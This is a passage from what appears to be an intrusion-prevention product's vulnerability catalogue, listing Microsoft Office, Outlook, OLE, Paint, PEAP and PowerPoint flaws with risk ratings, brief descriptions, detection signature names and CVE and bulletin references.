Microsoft-Office-Word-Stsh-Record-Parsing-Memory-Corruption

About this vulnerability:	A vulnerability in Microsoft Office Word
Risk:	Moderate
First detected in:	sgpkg-ips-431-4219
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Microsoft Office
Type:	Malfunction
Description:	A code execution vulnerability exists in Microsoft Office Word. The vulnerability is due to a memory corruption when parsing a specially crafted Word file. An attacker could exploit this vulnerability to execute arbitrary code in the context of the current user by enticing them to open a specially crafted Word document. Unsuccessful code execution attempts may crash the vulnerable application resulting in denial-of-service condition.
Situation:	File-OLE_Microsoft-Office-Word-Stsh-Record-Parsing-Memory-Corruption

Microsoft-Office-Word-Wordperfect-Converter-Buffer-Overflow

About this vulnerability:

A vulnerability in Microsoft Office Converter Pack

Risk:

Moderate

First detected in:

sgpkg-ips-384-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Office Converter Pack; Microsoft Word

Type:

Buffer Overflow

Description:

A stack-based buffer overflow vulnerability exists in the Microsoft Office WordPerfect 6.x converter. The flaw is due to a boundary error when processing a crafted WordPerfect document file. A remote attacker can exploit this vulnerability by enticing the target user to open a specially crafted WordPerfect document with the affected software. Successful exploitation can lead to arbitrary code execution within the security context of the currently logged on user. In the case of an unsuccessful code execution attack, the affected product will terminate resulting in loss of any unsaved data from the current session. An attack targeting this vulnerability can result in the injection and execution of code. If code execution is successful, the behaviour of the target will depend on the intention of the attacker. Any code injected will be executed within the security context of the currently logged in user.

Situation:

HTTP_SS-Microsoft-Office-Word-Wordperfect-Converter-Buffer-Overflow
File-Binary_Microsoft-Office-Word-Wordperfect-Converter-Buffer-Overflow

References:

CVE-2009-0088
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0088

BID-34469
http://www.securityfocus.com/bid/34469

OSVDB-53663
http://www.osvdb.org/53663

MS09-010
http://technet.microsoft.com/security/bulletin/MS09-010

Microsoft-OLE-Automation-Underflow-Vulnerability-CVE-2011-0658

About this vulnerability:

An attempt to exploit vulnerability in Microsoft Windows detected

Risk:

Moderate

First detected in:

sgpkg-ips-396-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

A vulnerability in OLE Automation allows an attacker to execute code when parsing WMF files.

Situation:

HTTP_SS-Microsoft-OLE-Automation-Underflow-Vulnerability-CVE-2011-0658
SMB-TCP_FR-Microsoft-OLE-Automation-Underflow-Vulnerability-CVE-2011-0658
File-Binary_Microsoft-OLE-Automation-Underflow-Vulnerability-CVE-2011-0658

References:

CVE-2011-0658
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0658

MS11-038
http://technet.microsoft.com/security/bulletin/MS11-038

Microsoft-OLE-Property-Vulnerability

About this vulnerability:

An attempt to exploit a vulnerability in Microsoft Internet Explorer detected

Risk:

Moderate

First detected in:

sgpkg-ips-428-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows XP

Software:

<os>

Type:

Malfunction

Description:

An attempt to exploit a vulnerability in Microsoft Windows detected

Situation:

File-OLE_Microsoft-OLE-Property-Vulnerability

References:

CVE-2011-3400
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3400

MS11-093
http://technet.microsoft.com/security/bulletin/MS11-093

Microsoft-OLE-Structured-Storage-File-Transfer

About this vulnerability:	Transfer of an OLE Structured Strorage file
Risk:	Low
First detected in:	sgpkg-ips-173-2032
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Any Software
Type:	Insecure Configuration
Description:	Object Linking and Embedding (OLE) is a technology developed by Microsoft for cross-application object referencing. OLE contains a method to store arbitrary data in file storage using a OLE Structured Storage file format. This file format is used by various applications, including Microsoft's Office family, for storage media.
Situation:	E-Mail_BS-Microsoft-OLE-Structured-Storage-File-Transfer E-Mail_BS-Microsoft-OLE-Structured-Storage-Suspicious-File-Transfer HTTP_SS-Microsoft-OLE-Structured-Storage-File-Download HTTP_SS-Microsoft-OLE-Structured-Storage-Suspicious-File-Download HTTP_SS-Microsoft-OLE-Structured-Storage-Excessive-SAT-Size File-OLE_Microsoft-Structured-Storage-File File-OLE_Microsoft-Structured-Storage-Suspicious-File File-OLE_Microsoft-Structured-Storage-Excessive-SAT-Size File-OLE_Unusual-Directory-Structure

Microsoft-OLE-UtOlePresStmToContentsStm-Use-After-Free-CVE-2025-21298

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

High

First detected in:

sgpkg-ips-1858-5242

Last changed:

sgpkg-ips-1858-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

A use-after-free vulnerability has been reported in Microsoft OLE. The vulnerability is due to improper memory management when handling OLE objects. A remote attacker could exploit this vulnerability by enticing the victim to open a crafted RTF or MSG file, or by sending a crafted email to the victim. Successful exploitation could result in denial-of-service conditions or, in the worst case, arbitrary code execution in the security context of the service.

Situation:

File-RTF_Microsoft-OLE-UtOlePresStmToContentsStm-Use-After-Free-CVE-2025-21298

References:

CVE-2025-21298
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21298

Microsoft-OMI-Management-Interface-Authentication-Bypass

About this vulnerability:

A vulnerability in Microsoft Azure OMI.

Risk:

High

First detected in:

sgpkg-ips-1404-5242

Last changed:

sgpkg-ips-1404-5242

Platform:

Linux; Unix

Software:

Microsoft Azure Open Management Infrastructure

Type:

Malfunction

Description:

A vulnerability in Microsoft Azure OMI, versions before 1.6.8-1, which allows remote attackers to execute operating system commands as root by sending an HTTP request without the Authorization header.

Situation:

HTTP_CS-Microsoft-OMI-Management-Interface-Authentication-Bypass

References:

CVE-2021-38647
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-38647

Microsoft-OpenType-Font-Handling-Memory-Corruption

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

Moderate

First detected in:

sgpkg-ips-436-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

A code execution vulnerability has been reported in Microsoft OpenType. The vulnerability is due to the way specially crafted OpenType fonts are parsed by the OpenType font driver which can lead to a double free memory error. A remote, unauthenticated attacker can exploit this vulnerability to execute arbitrary code with kernel permissions.

Situation:

File-Binary_Microsoft-OpenType-Font-Handling-Memory-Corruption

References:

CVE-2010-3957
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3957

BID-45315
http://www.securityfocus.com/bid/45315

MS10-091
http://technet.microsoft.com/security/bulletin/MS10-091

Microsoft-OpenType-Font-Index-Remote-Code-Execution

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

Moderate

First detected in:

sgpkg-ips-436-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

There is a code execution vulnerability in Microsoft Windows OpenType format driver. The vulnerability is due to the way specially crafted OpenType fonts are parsed by the OpenType font driver. Remote attackers can exploit this vulnerability by enticing target users to view a maliciously crafted font in an application that utilizes the affected font engine, such as Windows Font Viewer, or various web browsers. Successful exploitation of this vulnerability would result in arbitrary code execution within the kernel. In the case of an unsuccessful code injection attack, the affected system will crash with a BSoD, causing a denial of service condition.

Situation:

File-Binary_Microsoft-OpenType-Font-Index-Remote-Code-Execution

References:

CVE-2010-3956
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3956

BID-45311
http://www.securityfocus.com/bid/45311

MS10-091
http://technet.microsoft.com/security/bulletin/MS10-091

Microsoft-Outlook-Elevation-Of-Privilege-Vulnerability-CVE-2023-23397

About this vulnerability:

A vulnerability in Microsoft Outlook

Risk:

High

First detected in:

sgpkg-ips-1566-5242

Last changed:

sgpkg-ips-1605-5242

Platform:

Windows

Software:

Microsoft Outlook

Type:

Malfunction

Description:

An elevation of privilege vulnerability has been reported in Microsoft Outlook. Successful exploitation can allow remote attackers to capture NTLM hashes via malicious emails.

Situation:

File-Binary_Microsoft-Outlook-Elevation-Of-Privilege-Vulnerability-CVE-2023-23397
File-Binary_Microsoft-Outlook-Elevation-Of-Privilege-Vulnerability-CVE-2023-23397-2
File-OLE_Microsoft-Outlook-Elevation-Of-Privilege-Vulnerability-CVE-2023-23397

References:

CVE-2023-23397
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-23397

ms23-mar
http://technet.microsoft.com/security/bulletin/ms23-mar

Microsoft-Outlook-Express-And-Windows-Mail-Integer-Overflow

About this vulnerability:

A vulnerability in Microsoft Outlook Express and Windows Mail

Risk:

High

First detected in:

sgpkg-ips-304-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Outlook Express

Type:

Input Validation

Description:

There is a vulnerability in Microsoft Outlook Express and Windows Mail.

Situation:

POP3_SS-Microsoft-Outlook-Express-And-Windows-Mail-Integer-Overflow

References:

CVE-2010-0816
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0816

BID-40052
http://www.securityfocus.com/bid/40052

MS10-031
http://technet.microsoft.com/security/bulletin/MS10-031

Microsoft-Outlook-Express-And-Windows-Mail-MHTML-URL-Parsing-Vulnerability

About this vulnerability:

A vulnerability in Outlook Express and Windows Mail

Risk:

High

First detected in:

sgpkg-ips-586-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Outlook Express; Windows Mail

Type:

Malfunction

Description:

An MHTML redirect to may cause Internet Explorer to allow script access to domains other than the originating site.

Situation:

HTTP_SHS-Microsoft-Outlook-Express-And-Windows-Mail-MHTML-URL-Parsing-Vulnerability

References:

CVE-2008-1448
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1448

BID-30585
http://www.securityfocus.com/bid/30585

MS08-048
http://technet.microsoft.com/security/bulletin/MS08-048

Microsoft-Outlook-Express-MHTML-Url-Processing-Vulnerability

About this vulnerability:

A vulnerability in Microsoft Outlook Express

Risk:

Moderate

First detected in:

sgpkg-ips-414-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Microsoft Outlook Express

Type:

Malfunction

Description:

A vulnerability exists in the MHTML protocol handler of Microsoft Outlook Express. It allows a remote attacker to bypass the domain restriction and execute arbitrary code on the victim computer. Upon opening a malicious email or web page, arbitrary code from a remote location is downloaded and executed without user interaction. The behaviour of the attacked target is dependent on the content of the executed code. The proof of concept exploit provided in this report will start to download a remote binary program and save it to the following local directory without prompting for user interaction. "C:\Documents and Settings\Administrator\Start\Menu\Programs\Startup\"

Situation:

File-Text_Microsoft-Outlook-Express-MHTML-Url-Processing-Vulnerability

References:

CVE-2004-0380
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0380

BID-9658
http://www.securityfocus.com/bid/9658

MS04-013
http://technet.microsoft.com/security/bulletin/MS04-013

Microsoft-Outlook-iCal-Meeting-Request-Vevent-Record-Memory-Corruption

About this vulnerability:

A memory corruption vulnerability in Microsoft Outlook

Risk:

High

First detected in:

sgpkg-ips-92-1314

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Outlook

Type:

Buffer Overflow

Description:

There is a memory corruption vulnerability in Microsoft Outlook. A crafted iCal meeting request may be used to execute arbitary code in the context of the current user.

Situation:

E-Mail_BS-Microsoft-Outlook-iCal-Meeting-Request-Vevent-Record-Memory-Corruption
File-TextId_Microsoft-Outlook-iCal-Meeting-Request-Vevent-Memory-Corruption

References:

CVE-2007-0033
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0033

BID-21931
http://www.securityfocus.com/bid/21931

OSVDB-31252
http://www.osvdb.org/31252

MS07-003
http://technet.microsoft.com/security/bulletin/MS07-003

Microsoft-Outlook-Object-Security-Bypass-Vulnerability

About this vulnerability:

A vulnerability in Microsoft Outlook

Risk:

Moderate

First detected in:

sgpkg-ips-436-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Outlook; Microsoft Office

Type:

Insecure Configuration

Description:

There is a vulnerability within Microsoft Outlook 2003 that can be triggered remotely through a maliciously crafted email message. This message could bypass Outlook 2003's "Restricted Zone" security setting and gain access to remote resources. The behaviour of the attack target should not change when the victim reads an e-mail embedded with a specially crafted object.

Situation:

E-Mail_Microsoft-Outlook-Object-Security-Bypass-Vulnerability
File-Exe_Microsoft-Outlook-Object-Security-Bypass-Vulnerability

References:

CVE-2004-0503
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0503

BID-10369
http://www.securityfocus.com/bid/10369

OSVDB-6217
http://www.osvdb.org/6217

Microsoft-Outlook-Out-Of-Bounds-Vulnerability-CVE-2018-8587

About this vulnerability:

A vulnerability in Microsoft Office 365 ProPlus

Risk:

Moderate

First detected in:

sgpkg-ips-1119-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Outlook

Type:

Integer Overflow

Description:

Insufficient input validation of an unknown field in Outlook Rules (Rwz) files causes an integer overflow vulnerability in Microsoft Outlook. A successful exploit may allow an attacker to execute code with the privileges of the affected program.

Situation:

File-Binary_Microsoft-Outlook-Out-Of-Bounds-Vulnerability-CVE-2018-8587
File-Binary_Microsoft-Outlook-Rwz-CVE-2018-8587-Integer-Overflow

References:

CVE-2018-8587
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8587

Microsoft-Outlook-Outlmime.dll-Content-Type-Denial-Of-Service

About this vulnerability:

A vulnerability in Microsoft Outlook

Risk:

Moderate

First detected in:

sgpkg-ips-1505-5242

Last changed:

sgpkg-ips-1505-5242

Platform:

Windows

Software:

Microsoft Outlook

Type:

Input Validation

Description:

A denial of service vulnerability exists in Microsoft Office Outlook. The vulnerability is due to incorrect parsing of Content-Type header. A remote attacker could exploit this vulnerability by sending an email that contains crafted HTML. Successful exploitation could result in the Denial of Service.

Situation:

SMTP_CS-Microsoft-Outlook-Outlmime.dll-Content-Type-Denial-Of-Service

References:

CVE-2022-35742
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-35742

Microsoft-Outlook-OWA-URL-Redirection-CVE-2014-6336

About this vulnerability:

An attempt to exploit a vulnerability in Microsoft Exchange

Risk:

Moderate

First detected in:

sgpkg-ips-620-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Exchange Server

Type:

Cross-site Scripting

Description:

A vulnerability in Microsoft Exchange.

Situation:

File-Text_Microsoft-Outlook-OWA-URL-Redirection-CVE-2014-6336

References:

CVE-2014-6336
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6336

MS14-075
http://technet.microsoft.com/security/bulletin/MS14-075

Microsoft-Outlook-RCE-CVE-2015-6123

About this vulnerability:

A vulnerability in Microsoft Outlook

Risk:

Moderate

First detected in:

sgpkg-ips-702-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Outlook

Type:

Malfunction

Description:

A vulnerability in Microsoft Outlook

Situation:

File-Text_Microsoft-Outlook-RCE-CVE-2015-6123

References:

CVE-2015-6123
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6123

MS15-116
http://technet.microsoft.com/security/bulletin/MS15-116

Microsoft-Outlook-Remote-Code-Execution-Monikerlink-CVE-2024-21413

About this vulnerability:

A vulnerability in Microsoft Outlook

Risk:

High

First detected in:

sgpkg-ips-1693-5242

Last changed:

sgpkg-ips-1693-5242

Platform:

Generic

Software:

Microsoft Outlook

Type:

Malfunction

Description:

A remote code execution vulnerability has been reported in Microsoft Outlook.

Situation:

File-Text_Microsoft-Outlook-Remote-Code-Execution-Monikerlink-CVE-2024-21413

References:

CVE-2024-21413
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21413

ms24-feb
http://technet.microsoft.com/security/bulletin/ms24-feb

Microsoft-Outlook-Rwz-Integer-Overflow

About this vulnerability:

A vulnerability in Microsoft Office 365 ProPlus

Risk:

Moderate

First detected in:

sgpkg-ips-1119-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Outlook

Type:

Integer Overflow

Description:

Insufficient input validation of an unknown field of Outlook Rules (RWZ) files causes an integer overflow vulnerability in Microsoft Outlook. A successful exploit may allow an attacker to execute arbitrary code on the target system.

Situation:

File-Binary_Microsoft-Outlook-Rwz-Integer-Overflow

References:

CVE-2018-8582
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8582

Microsoft-Outlook-Security-Feature-Bypass-Vulnerability-CVE-2017-11774

About this vulnerability:

A vulnerability in Microsoft Outlook

Risk:

High

First detected in:

sgpkg-ips-1308-5242

Last changed:

sgpkg-ips-1308-5242

Platform:

Generic

Software:

Microsoft Outlook

Type:

Input Validation

Description:

An arbitrary command execution vulnerability exists in Microsoft Outlook 2010 SP2, Outlook 2013 SP1 and RT SP1, and Outlook 2016, which allows an attacker to inject code to the configurable Outlook home page.

Situation:

File-Text_WScript.Shell-ActiveX-Object-Local-File-Execute

References:

CVE-2017-11774
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11774

Microsoft-Outlook-Smb-Attach_By_Reference-Code-Execution

About this vulnerability:

A vulnerability in Microsoft Office Outlook

Risk:

High

First detected in:

sgpkg-ips-321-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Outlook

Type:

Input Validation

Description:

A code execution vulnerability has been reported in Microsoft Office Outlook Email client application. The vulnerability is due to a design error while Outlook parses specially crafted email attachments. Remote attackers can exploit this vulnerability by sending a crafted email attachment using the ATTACH_BY_REFERENCE method. Successful exploitation of this vulnerability would result in arbitrary code execution with the privileges of the logged on user.

Situation:

E-Mail_BS-Microsoft-Outlook-SMB-Attachment
E-Mail_BS-Microsoft-Outlook-SMB-Msg-Attachment
HTTP_SS-Microsoft-Outlook-SMB-Msg-Attachment
File-OLE_Microsoft-Outlook-SMB-Msg-Attachment
File-Binary_Microsoft-Outlook-SMB-Attachment
File-Binary_Microsoft-Outlook-Smb-Attach_By_Reference-Code-Execution

References:

CVE-2010-0266
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0266

BID-41446
http://www.securityfocus.com/bid/41446

MS10-045
http://technet.microsoft.com/security/bulletin/MS10-045

Microsoft-Outlook-Web-Access-Cross-Site-Scripting-Vulnerability

About this vulnerability:

A vulnerability in Microsoft Exchange Server

Risk:

Moderate

First detected in:

sgpkg-ips-436-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Exchange Server

Type:

Cross-site Scripting

Description:

There is a cross-site scripting vulnerability in the Outlook Web Access component of Exchange Server 5.5. The flaw is caused by insufficient sanitization of user's email messages. A malicious user can leverage this flaw to inject and execute script code in the security context of the current user email account. A successful attack exploiting this vulnerability can inject malicious script code into the OWA session. An attacker can read or delete email, access the user's contact list and other operations on the user's mail account. The attacker can fully control the compromised mail account. The malicious script could also take actions on the user's computer in the security context of the OWA web site.

Situation:

File-Text_Microsoft-Outlook-Web-Access-Cross-Site-Scripting-Vulnerability

References:

CVE-2005-0563
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0563

BID-13952
http://www.securityfocus.com/bid/13952

MS05-029
http://technet.microsoft.com/security/bulletin/MS05-029

Microsoft-Outlook-Web-Access-HTML-Validating-Cross-Site-Scripting

About this vulnerability:

A vulnerability in Microsoft Exchange Server

Risk:

High

First detected in:

sgpkg-ips-379-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Exchange Server

Type:

Input Validation

Description:

A script injection vulnerability exists in Microsoft Exchange Server running Outlook Web Access (OWA). The vulnerability is caused by improper sanitization of e-mail messages which contain script code when they are read through Outlook Web Access. A malicious user may exploit this flaw to inject and execute HTML and script code in the security context of the target user's browser session.

Situation:

SMTP_CS-Microsoft-Outlook-Web-Access-HTML-Validating-Cross-Site-Scripting

References:

CVE-2008-2248
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2248

BID-30130
http://www.securityfocus.com/bid/30130

MS08-039
http://technet.microsoft.com/security/bulletin/MS08-039

Microsoft-Outlook-Word-Object-Tag

About this vulnerability:	A vulnerability in Microsoft Outlook
Risk:	High
First detected in:	sgpkg-ips-420-4219
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	Microsoft Outlook
Type:	Input Validation
Description:	There is a vulnerability in Microsoft Outlook when Microsoft Word is enabled in Outlook as the default editor for email messages. The vulnerability exists in the handling of object tags, and can be triggered remotely when a user replies or forwards a maliciously crafted email message. This vulnerability could bypass Outlook's "Restricted Zone" security setting and enable arbitrary access to remote resources.
Situation:	File-Text_Microsoft-Outlook-Word-Object-Tag

Microsoft-OWA-XSS-Vulnerability-CVE-2015-1628

About this vulnerability:

A vulnerability in Microsoft Outlook Web Access

Risk:

High

First detected in:

sgpkg-ips-633-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Microsoft Outlook Web Access

Type:

Malfunction

Description:

A vulnerability in Microsoft Outlook Web Access

Situation:

HTTP_CSH-Microsoft-OWA-XSS-Vulnerability-CVE-2015-1628

References:

CVE-2015-1628
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1628

MS15-026
http://technet.microsoft.com/security/bulletin/MS15-026

Microsoft-Paint-JPEG-Image-Parsing-Integer-Overflow

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

Moderate

First detected in:

sgpkg-ips-395-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Integer Overflow

Description:

An integer overflow vulnerability exists in Microsoft Paint, shipped with various versions of Microsoft Windows. The vulnerability is due to an input validation error while parsing specially crafted JPEG image files. Remote attackers can exploit this vulnerability by enticing target users to open maliciously crafted JPEG image files in a vulnerable version of MS Paint. Successful exploitation would cause a heap buffer overflow that can lead to arbitrary code execution in the security context of the logged in user. In an unsuccessful attack, the affected application may abnormally terminate.

Situation:

HTTP_SS-Microsoft-Paint-JPEG-Image-Parsing-Integer-Overflow
File-JPEG_Microsoft-Paint-JPEG-Image-Parsing-Integer-Overflow

References:

CVE-2010-0028
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0028

BID-38042
http://www.securityfocus.com/bid/38042

MS10-005
http://technet.microsoft.com/security/bulletin/MS10-005

Microsoft-PEAP-Heap-Overflow-Vulnerability-CVE-2023-21689

About this vulnerability:

An attempt to exploit a vulnerability in Extensible Authentication Protocol (EAP) service detected

Risk:

High

First detected in:

sgpkg-ips-1556-5242

Last changed:

sgpkg-ips-1557-5242

Platform:

Windows

Software:

Extensible Authentication Protocol (EAP) service

Type:

Heap Overflow

Description:

A heap out-of-bound write issue is identified in the Microsoft Protected Extensible Authentication Protocol (PEAP) handler. This vulnerability can be exploited to achieve remote code execution.

Situation:

IPv4_Microsoft-PEAP-Heap-Overflow-Vulnerability-CVE-2023-21689

References:

CVE-2023-21689
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-21689

ms23-feb
http://technet.microsoft.com/security/bulletin/ms23-feb

Microsoft-PEAP-Heap-Overflow-Vulnerability-CVE-2023-21690

About this vulnerability:

An attempt to exploit a vulnerability in Extensible Authentication Protocol (EAP) service detected

Risk:

High

First detected in:

sgpkg-ips-1556-5242

Last changed:

sgpkg-ips-1557-5242

Platform:

Windows

Software:

Extensible Authentication Protocol (EAP) service

Type:

Heap Overflow

Description:

A heap out-of-bound write issue is identified in the Microsoft Protected Extensible Authentication Protocol (PEAP) handler. This vulnerability can be exploited to achieve remote code execution.

Situation:

IPv4_Microsoft-PEAP-Heap-Overflow-Vulnerability-CVE-2023-21690

References:

CVE-2023-21690
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-21690

ms23-feb
http://technet.microsoft.com/security/bulletin/ms23-feb

Microsoft-PowerPoint-2003-Heap-Overflow

About this vulnerability:	Microsoft PowerPoint 2003 Heap Overflow
Risk:	High
First detected in:	sgpkg-ips-1321-5242
Last changed:	sgpkg-ips-1337-5242
Platform:	Generic
Software:	Microsoft PowerPoint 2003
Type:	Malfunction
Description:	There exists a heap overflow vulnerability in Microsoft Powerpoint 2003.
Situation:	File-Text_Microsoft-PowerPoint-2003-Heap-Overflow File-OLE_Microsoft-PowerPoint-2003-Heap-Overflow

Microsoft-PowerPoint-Data-Out-Of-Bounds-CVE-2009-1131

About this vulnerability:

A vulnerability in Microsoft PowerPoint

Risk:

High

First detected in:

sgpkg-ips-220-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Microsoft PowerPoint

Type:

Buffer Overflow

Description:

There is a vulnerability in Microsoft PowerPoint.

Situation:

E-Mail_BS-Microsoft-PowerPoint-Data-Out-Of-Bounds-CVE-2009-1131
HTTP_SS-Microsoft-PowerPoint-Data-Out-Of-Bounds-CVE-2009-1131
File-OLE_Microsoft-PowerPoint-Data-Out-Of-Bounds-CVE-2009-1131

References:

CVE-2009-1131
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1131

BID-34841
http://www.securityfocus.com/bid/34841

OSVDB-54393
http://www.osvdb.org/54393

MS09-017
http://technet.microsoft.com/security/bulletin/MS09-017

Microsoft-PowerPoint-Fp-Technocolor-TimeBandit-Vulnerability

About this vulnerability:

An attempt to exploit PowerPoint vulnerability CVE-2011-0655

Risk:

Moderate

First detected in:

sgpkg-ips-388-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft PowerPoint

Type:

Malfunction

Description:

A vulnerability in Microsoft PowerPoint record parsing may lead to code execution

Situation:

HTTP_SS-Microsoft-PowerPoint-Fp-Technocolor-TimeBandit-Vulnerability
File-OLE_Microsoft-PowerPoint-Fp-Technocolor-TimeBandit-Vulnerability

References:

CVE-2011-0655
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0655

MS11-022
http://technet.microsoft.com/security/bulletin/MS11-022

Microsoft-PowerPoint-Heap-Corruption-CVE-2009-1130

About this vulnerability:

A heap corruption vulnerability in Microsoft PowerPoint

Risk:

High

First detected in:

sgpkg-ips-220-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Microsoft PowerPoint

Type:

Buffer Overflow

Description:

There is a heap corruption vulnerability in Microsoft PowerPoint.

Situation:

E-Mail_BS-Microsoft-PowerPoint-Heap-Corruption-CVE-2009-1130
HTTP_SS-Microsoft-PowerPoint-Heap-Corruption-CVE-2009-1130
File-OLE_Microsoft-PowerPoint-Heap-Corruption-CVE-2009-1130

References:

CVE-2009-1130
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1130

BID-34840
http://www.securityfocus.com/bid/34840

MS09-017
http://technet.microsoft.com/security/bulletin/MS09-017

Microsoft-PowerPoint-Insecure-Library-Loading-CVE-2011-3396

About this vulnerability:

An attempt to exploit a vulnerability in Microsoft PowerPoint detected

Risk:

Moderate

First detected in:

sgpkg-ips-428-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft PowerPoint

Type:

Malfunction

Description:

An attempt to exploit a vulnerability in Microsoft PowerPoint detected

Situation:

HTTP_CSU-Microsoft-PowerPoint-Insecure-Library-Loading-CVE-2011-3396
SMB-TCP_CHS-Microsoft-PowerPoint-Insecure-Library-Loading-CVE-2011-3396

References:

CVE-2011-3396
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3396

MS11-094
http://technet.microsoft.com/security/bulletin/MS11-094

Microsoft-PowerPoint-Integer-Overflow-CVE-2009-0221

About this vulnerability:

An integer overflow vulnerability in Microsoft PowerPoint

Risk:

High

First detected in:

sgpkg-ips-220-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Microsoft PowerPoint

Type:

Buffer Overflow

Description:

There is an integer overflow vulnerability in Microsoft PowerPoint.

Situation:

E-Mail_BS-Microsoft-PowerPoint-Integer-Overflow-CVE-2009-0221
HTTP_SS-Microsoft-PowerPoint-Integer-Overflow-CVE-2009-0221
File-OLE_Microsoft-PowerPoint-Integer-Overflow-CVE-2009-0221

References:

CVE-2009-0221
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0221

BID-34835
http://www.securityfocus.com/bid/34835

OSVDB-54394
http://www.osvdb.org/54394

MS09-017
http://technet.microsoft.com/security/bulletin/MS09-017

Microsoft-PowerPoint-Integer-Overflow-CVE-2009-0224

About this vulnerability:

A memory corruption vulnerability in Microsoft PowerPoint

Risk:

High

First detected in:

sgpkg-ips-220-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Microsoft PowerPoint

Type:

Buffer Overflow

Description:

There is a memory corruption vulnerability in Microsoft PowerPoint.

Situation:

E-Mail_BS-Microsoft-PowerPoint-Memory-Corruption-CVE-2009-0224
HTTP_SS-Microsoft-PowerPoint-Memory-Corruption-CVE-2009-0224
File-OLE_Microsoft-PowerPoint-Memory-Corruption-CVE-2009-0224

References:

CVE-2009-0224
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0224

BID-34879
http://www.securityfocus.com/bid/34879

MS09-017
http://technet.microsoft.com/security/bulletin/MS09-017

Microsoft-PowerPoint-Memory-Corruption-CVE-2009-0225

About this vulnerability:

A vulnerability in Microsoft PowerPoint

Risk:

High

First detected in:

sgpkg-ips-220-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Microsoft PowerPoint

Type:

Buffer Overflow

Description:

There is a memory corruption vulnerability in Microsoft PowerPoint.

Situation:

E-Mail_BS-Microsoft-PowerPoint-Memory-Corruption-CVE-2009-0225
HTTP_SS-Microsoft-PowerPoint-Memory-Corruption-CVE-2009-0225
File-OLE_Microsoft-PowerPoint-Memory-Corruption-CVE-2009-0225

References:

CVE-2009-0225
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0225

BID-34880
http://www.securityfocus.com/bid/34880

